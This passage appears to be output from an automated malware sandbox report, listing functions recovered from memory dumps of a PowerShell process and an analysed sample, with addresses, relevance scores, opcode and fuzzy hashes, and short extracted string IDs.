                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1fc37aa916fd87c9ac1d7aaa04b20631975f9e2a49649e410b1c5c8e01e01d69
                                                          • Instruction ID: fc306ddd1f2d31b104c060c1eaa3bf81615ce8acf7bcaad683af6432be2bdae2
                                                          • Opcode Fuzzy Hash: 1fc37aa916fd87c9ac1d7aaa04b20631975f9e2a49649e410b1c5c8e01e01d69
                                                          • Instruction Fuzzy Hash: 98D09239B44218CFDB04DB98E895A9CF371FB84329F1084A9E519AB251CB32A912CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987EA0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1377800323a20fb739765d2e4056da2138c3fd57a564885cb783d9f7081b131b
                                                          • Instruction ID: ade30f40484f3032606fc8875521f32570569cf844405f4f213dc8de2ee4f70d
                                                          • Opcode Fuzzy Hash: 1377800323a20fb739765d2e4056da2138c3fd57a564885cb783d9f7081b131b
                                                          • Instruction Fuzzy Hash: B4C08C218182C82EFF0293B40CAD510AF30495321230601E6C801CA837E838AC04C352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987938 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6dd5c64c441d585b887d020befa6093cf85ba6e632a3d099700706600989c99
                                                          • Instruction ID: 5168e239e6920b7190ef12b3890df36b321467334278cec7960c1fada4c352b4
                                                          • Opcode Fuzzy Hash: d6dd5c64c441d585b887d020befa6093cf85ba6e632a3d099700706600989c99
                                                          • Instruction Fuzzy Hash: 64D012300406088FC2686BACEC185143714FB8230539118FDF54D9F27ADEA7F4458750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987940 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd61514e7fef662d4eb1f2533cbdf793bd0e2942ccc603abdbc463901e80d148
                                                          • Instruction ID: 5a22671614cbf7450262ce684e19f94b72e82f6f6e223cb22e1ed4a6421137a3
                                                          • Opcode Fuzzy Hash: fd61514e7fef662d4eb1f2533cbdf793bd0e2942ccc603abdbc463901e80d148
                                                          • Instruction Fuzzy Hash: 08B092300447088FC258AFB9E4089187729BB4021538108A9E90E0A2968E76E884CA44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 08A43A98 Relevance: .4, Instructions: 373COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1336212223.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_8a40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69b0228ca96c728e3a6198971ef00ec9254d1a08e69613e988889917cc412a80
                                                          • Instruction ID: 1ba5bb4db4c3d7d69eb3ebe7930c71edca766c222916cf3f05d2aad4954989a1
                                                          • Opcode Fuzzy Hash: 69b0228ca96c728e3a6198971ef00ec9254d1a08e69613e988889917cc412a80
                                                          • Instruction Fuzzy Hash: E3E12870B002059FEF14DF25C944BAABBF1AF84305F14866DE406DF7A1EB76E9468B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07851BE0 Relevance: 10.4, Strings: 8, Instructions: 408COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$4'q$4'q$84m$84m$tPq$tPq
                                                          • API String ID: 0-643025313
                                                          • Opcode ID: edc6176cb6b8983797e017b9fbc1243aa0565bcdc74e9c17242b79dad9706a37
                                                          • Instruction ID: 69d452ecafcedaefe7766b4da6eeeb3c90be0c3cd8eb9eec98ea3d86645be35e
                                                          • Opcode Fuzzy Hash: edc6176cb6b8983797e017b9fbc1243aa0565bcdc74e9c17242b79dad9706a37
                                                          • Instruction Fuzzy Hash: FED12BB1F0430A8FD7258F6994087AABBB2AFE6311F1884ABDD55CB241DB31DC45C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07853928 Relevance: 10.3, Strings: 8, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                                          • API String ID: 0-2958727440
                                                          • Opcode ID: dab95747cfd5e5fd433d0fef5d432733ca98f69d9dde900c2ad1cd78eebb1d72
                                                          • Instruction ID: bdf7fcf5bc6d13c6dac2d6fe03244118858c6c3fd81af4ff29a0ac5676575978
                                                          • Opcode Fuzzy Hash: dab95747cfd5e5fd433d0fef5d432733ca98f69d9dde900c2ad1cd78eebb1d72
                                                          • Instruction Fuzzy Hash: 7BA19BB17043469FD7259F69980077ABBA2EFD62A8F14806FDC46CB792CA31CC45C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07853678 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$$q$$q$$q
                                                          • API String ID: 0-170447905
                                                          • Opcode ID: ba0e51d474f734f3f867b7e529589fcea3e1208f90ba83adef606c0e9ad3ae3f
                                                          • Instruction ID: bac82ef4d17bcf54e8b8cb4aa94ee667690bb37851e0cc4e01f0155ff7ae9b9b
                                                          • Opcode Fuzzy Hash: ba0e51d474f734f3f867b7e529589fcea3e1208f90ba83adef606c0e9ad3ae3f
                                                          • Instruction Fuzzy Hash: 19515DF1B043069FD7294E698800766BBE2EFD6699F14807BDC46CB741DB31C945C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987A21 Relevance: 5.2, Strings: 4, Instructions: 243COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `q$`q$`q$`q
                                                          • API String ID: 0-10485352
                                                          • Opcode ID: 1c8db1d51116b27c14f8b287fabf57ce69e8607ee91a1c2a9487f148f9af668e
                                                          • Instruction ID: 76baf83584e23b0b46f0335fccd9f3b052409f4749980eb79a9dbaeba2ff1c05
                                                          • Opcode Fuzzy Hash: 1c8db1d51116b27c14f8b287fabf57ce69e8607ee91a1c2a9487f148f9af668e
                                                          • Instruction Fuzzy Hash: 56B19374E003199FDB54DFA9D980A9DFBF2FF88300F208669E419AB305DB70A9458F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `q$`q$`q$`q
                                                          • API String ID: 0-10485352
                                                          • Opcode ID: 3bf084fcc06d0d09a569a0fc2bbc658029d074fe0e9db94edf0266cea0161d13
                                                          • Instruction ID: a0d129fcd32c7535d271e82b29e0ab6a088c77080373af27b28de0a83a03ad4c
                                                          • Opcode Fuzzy Hash: 3bf084fcc06d0d09a569a0fc2bbc658029d074fe0e9db94edf0266cea0161d13
                                                          • Instruction Fuzzy Hash: 55B18474E003199FDB54DFA9D980A9DFBF2FF88310F208669D419AB305DB70A9458F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07855798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $q$$q$$q$$q
                                                          • API String ID: 0-4102054182
                                                          • Opcode ID: af61ade5cf666af38ab32a7b1673518b466cd1d07d4674e3c00122dafc55cf4e
                                                          • Instruction ID: 32ca610bc5a2eb11819a3d56038c742b5a18667abb421fd52748756c3c63844a
                                                          • Opcode Fuzzy Hash: af61ade5cf666af38ab32a7b1673518b466cd1d07d4674e3c00122dafc55cf4e
                                                          • Instruction Fuzzy Hash: 122138B1710316ABEB345D2A9800737B7D7EBD5715F28843AAD06CB381DD72D9118361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07850308 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$$q$$q
                                                          • API String ID: 0-3199993180
                                                          • Opcode ID: 9d1998096ca9c35ef9c4574e79fc694048578d8baaae236e49d373e0bcc16059
                                                          • Instruction ID: 36ffe6495a5f1ad1911f90f33de03901eb08bc406b072e6cdf74fd6ca7e23c14
                                                          • Opcode Fuzzy Hash: 9d1998096ca9c35ef9c4574e79fc694048578d8baaae236e49d373e0bcc16059
                                                          • Instruction Fuzzy Hash: DF01D42161E3974FD327127428202A66FB25F9362072E80D7D885CF2A7CA544C4A83A3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 00B315E0 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: piAq
                                                          • API String ID: 0-3273502913
                                                          • Opcode ID: 5678e79ed46a93dbc1258b20b136c87fd05ef587239e0b1ac98f08d8b696e122
                                                          • Instruction ID: ec396aa6fba87898bf15b229a69a6943914083913b855eff4b5fb99e25c43b7a
                                                          • Opcode Fuzzy Hash: 5678e79ed46a93dbc1258b20b136c87fd05ef587239e0b1ac98f08d8b696e122
                                                          • Instruction Fuzzy Hash: 2FC19D74E01219CFCB14DFA9C484ADDBBF5BF49304F2486AAD815AB365DB30A946CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B307F3 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: 35e16e276c11522390a655ca6c3ac8ece40b73898aa849cd4017c61eef0125a4
                                                          • Instruction ID: c04fce4eb390530d57fbd3b9013f9e7ee64763606d93a1e71965e2216ec32c94
                                                          • Opcode Fuzzy Hash: 35e16e276c11522390a655ca6c3ac8ece40b73898aa849cd4017c61eef0125a4
                                                          • Instruction Fuzzy Hash: 90C1B574E003188FDB58DFA9D894A9DBBB2FF89300F2085A9D415AB3A5DB34AD45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B30870 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: ae0f9f5325b3b012c56805d95cbddc461ed4487f1714d3e018f6f4f4603aaf39
                                                          • Instruction ID: 2ce6e031bef461f7f5c0f9a37c4df22b3f6058855452272ffd2ff9e29aab187a
                                                          • Opcode Fuzzy Hash: ae0f9f5325b3b012c56805d95cbddc461ed4487f1714d3e018f6f4f4603aaf39
                                                          • Instruction Fuzzy Hash: 4DB1B574E003188FDB54DFA9D894A9DBBB2FF89300F2085A9D415BB365DB34A945CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B30880 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: aq
                                                          • API String ID: 0-608928628
                                                          • Opcode ID: c25f388f81018117832df9845fe876d56e965e59ff56110b8d4716b9bddc3301
                                                          • Instruction ID: eedde0f0ff27a9774dcb4c596cfbc6e33ef7b9b5be9e30760b5d31cf5b61407c
                                                          • Opcode Fuzzy Hash: c25f388f81018117832df9845fe876d56e965e59ff56110b8d4716b9bddc3301
                                                          • Instruction Fuzzy Hash: 36B1C374E002188FDB58DFA9D894A9DBBB2FF89300F208569E419BB365DB34A945CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B31230 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c756d9b0a5531a01590e5c8366eeac6f60162706c8dc6c561031101f21eb8a2b
                                                          • Instruction ID: cef70fc4677771818741ceb41a2596d9960573a9d0d6aa3bd3af6f90b228e1eb
                                                          • Opcode Fuzzy Hash: c756d9b0a5531a01590e5c8366eeac6f60162706c8dc6c561031101f21eb8a2b
                                                          • Instruction Fuzzy Hash: 66914F78A012189FCB04CFA9D58499DFBF6BF89310B2586A5E809AB365D730EE45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B32DB4 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f92bc153e2b6329d4ac16e1c45063ada712d64d8875b6869cda3b3e87bb97146
                                                          • Instruction ID: 8aff862f5fe3654d27d1db96907c7c7f365a53cdbbf9a0a32aae78fb78eadcfc
                                                          • Opcode Fuzzy Hash: f92bc153e2b6329d4ac16e1c45063ada712d64d8875b6869cda3b3e87bb97146
                                                          • Instruction Fuzzy Hash: 84118F75D042589FDB28DFA8C85ABEDBFF1AF4A300F249069D401B72A1CB704849DF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B315D2 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f08b7408aef57bdbb554d818e9d90085cf828fd5ba3d4fe9e076b1e7137c1d2f
                                                          • Instruction ID: f7ac9a96a02ad64f7385635bc0113c0f78b1c26b7afef3fdab8e851796008d62
                                                          • Opcode Fuzzy Hash: f08b7408aef57bdbb554d818e9d90085cf828fd5ba3d4fe9e076b1e7137c1d2f
                                                          • Instruction Fuzzy Hash: 3B410734D05218CFCB14CFA8C884AEDBBF9EF49304F2486AAC415B7265DB30A94ACF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B32105 Relevance: .1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57e7a01fd258099fa8bd856477734d6b5ebc3743bd73047d363b0dae652b7e11
                                                          • Instruction ID: d3e12021e7ee213ff740c9ea59fc8a5a503c20c37b0874eb268d4f8b4bbe01b0
                                                          • Opcode Fuzzy Hash: 57e7a01fd258099fa8bd856477734d6b5ebc3743bd73047d363b0dae652b7e11
                                                          • Instruction Fuzzy Hash: 39414971D012489FDB24DFA9D880AEEBFF1FF48350F24806AE459AB250CB345946CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B31E70 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89c888df3a2bade4d4bc9021006637d8316e89dd2a996eb3ad9213721045e3b6
                                                          • Instruction ID: afb79a13e92238bb890dfd61c63133b25b11440ea2cc451662437c2dc37494e9
                                                          • Opcode Fuzzy Hash: 89c888df3a2bade4d4bc9021006637d8316e89dd2a996eb3ad9213721045e3b6
                                                          • Instruction Fuzzy Hash: 1E318D30B002149FDB14CB69C480A9EFBFAEF88350F2485AAE84AD7755DB30EC41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B32110 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc29b781382bc77b212f893c88f0798f232f7fbf7fb3460f840a7dd2980d5773
                                                          • Instruction ID: fbeb4222ef5ad2a8b6537c150f07028c67cd46860da66048348f64ca8108ec68
                                                          • Opcode Fuzzy Hash: bc29b781382bc77b212f893c88f0798f232f7fbf7fb3460f840a7dd2980d5773
                                                          • Instruction Fuzzy Hash: AC311770D012589FDB24CFA9C980ADEBFF5AF48310F248459E819AB250DB359945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B31220 Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 067d7cdd88ca20b2047603c5ef5ce910ae69ce21e0d2fade18ddb53ae35f1015
                                                          • Instruction ID: 5c4514e66870a0a9dc958a881bf59dbdbfc03bcf9d58639bf8406fe18f34bbd2
                                                          • Opcode Fuzzy Hash: 067d7cdd88ca20b2047603c5ef5ce910ae69ce21e0d2fade18ddb53ae35f1015
                                                          • Instruction Fuzzy Hash: 1F31E575E012489FCB14CFA9D984ADDBBF6FF89300F2485AAE805A7365DB309945CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00ADD5F0 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319510155.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_add000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2bf3749c252036daa2632fb343f8d625138b1d7b66d49dee0ecd07afb1b5e92f
                                                          • Instruction ID: 60621e8ce31596826a8e788c89a34fdc02895947ad28e786644907f3ef614bae
                                                          • Opcode Fuzzy Hash: 2bf3749c252036daa2632fb343f8d625138b1d7b66d49dee0ecd07afb1b5e92f
                                                          • Instruction Fuzzy Hash: 702100B2614240EFDB14DF14D9C0B26BF65FB98320F20856AE80A0B356C336D856DAE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00ADD6DC Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319510155.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_add000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 632cbe1a574958c33f86cffd4c56596ee9821bab3cf2bb01ca8c17fcf03e69d9
                                                          • Instruction ID: cbfcfcdb1bcf67e07d7de8ddcae36f28bd0401309e7933ff62e68a8138f463a3
                                                          • Opcode Fuzzy Hash: 632cbe1a574958c33f86cffd4c56596ee9821bab3cf2bb01ca8c17fcf03e69d9
                                                          • Instruction Fuzzy Hash: F0210675504304DFDB14DF10D9C0B16BF66FB94324F2085AAE80A0B346C336D856CAA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B314BF Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3acec4ff146b9c48dc55ecd80adcf01e83f01fc00b549f7845746544807b5ba0
                                                          • Instruction ID: 3a9847fcba67e26ed5a953ad3d668e3675da3133a08c55920336ca06c1925650
                                                          • Opcode Fuzzy Hash: 3acec4ff146b9c48dc55ecd80adcf01e83f01fc00b549f7845746544807b5ba0
                                                          • Instruction Fuzzy Hash: 38214671E0429E9FCF05DFA8C8509DDBBB5FF49310B4082A6D551BB2A1D730A906CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B30C39 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6eace4a5ae5420a4720cd31dc3fc6551baec82bce3325355b7de0a10ab8b2c7
                                                          • Instruction ID: 015c3a0c744181bb9a79c294522725361f141e67591483922c25a2994376ab34
                                                          • Opcode Fuzzy Hash: c6eace4a5ae5420a4720cd31dc3fc6551baec82bce3325355b7de0a10ab8b2c7
                                                          • Instruction Fuzzy Hash: A9211274A012089FDB08DFA9D894AEEBBF2EF89300F24916AE401B7260CB715945CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B3111A Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcb492c3dfb99241cafe5d5c5f18a5ddf1494979f4d4f57c1579e936eca91c0c
                                                          • Instruction ID: 19344fa75b6186bca394989a4096136c138e3cd0865dc320329d57c8ea70516d
                                                          • Opcode Fuzzy Hash: bcb492c3dfb99241cafe5d5c5f18a5ddf1494979f4d4f57c1579e936eca91c0c
                                                          • Instruction Fuzzy Hash: 4F212771D0025A9FCF02DFA8D4509DDBBB1FF49310F41869AD495BB2A2D730A906CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B31DF8 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f08990fd24e490816bbadba6b75fbcd2123e7014b600951b3343dfa26063ffa
                                                          • Instruction ID: e8f52b5b45f588805d7e2a3af7e66c07984410838ffc2b90dd2a76db4d1fb037
                                                          • Opcode Fuzzy Hash: 0f08990fd24e490816bbadba6b75fbcd2123e7014b600951b3343dfa26063ffa
                                                          • Instruction Fuzzy Hash: 5D113735B052159FDB14DBA8C880A9EB7F9EF89320F2089A6E956DB251D730DC098B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B31128 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.2319815337.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_b30000_9K25QyJ4hA.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
